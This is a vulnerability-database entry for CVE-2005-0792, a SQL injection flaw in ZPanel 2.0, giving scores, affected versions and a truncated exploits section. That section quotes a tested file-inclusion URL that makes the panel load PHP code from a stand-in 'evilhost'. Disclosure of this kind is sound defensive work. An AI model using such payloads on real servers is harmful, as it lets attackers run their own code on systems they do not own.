7.5
CVSSv2

CVE-2005-0792

Published: 15/03/2005 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in ZPanel 2.0 allows remote malicious users to execute arbitrary SQL commands via the (1) uname parameter to index.php or (2) page parameter to zpanel.php.

Vulnerable Product Search on Vulmon Subscribe to Product

zpanel zpanel 2.5_beta10

zpanel zpanel 2.5_beta9

zpanel zpanel 2.0

zpanel zpanel 2.5_beta

Exploits

# Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel <= 25 beta 10, remote - in ZPanel 20 [exploit for v 20] localhost/zpanel/zpanelphp?page=evilhost/shell where evilhost/shellphp - evil php code script [exploit for v 25 beta] localhost/zpanel/zpanelphp?page=billi ...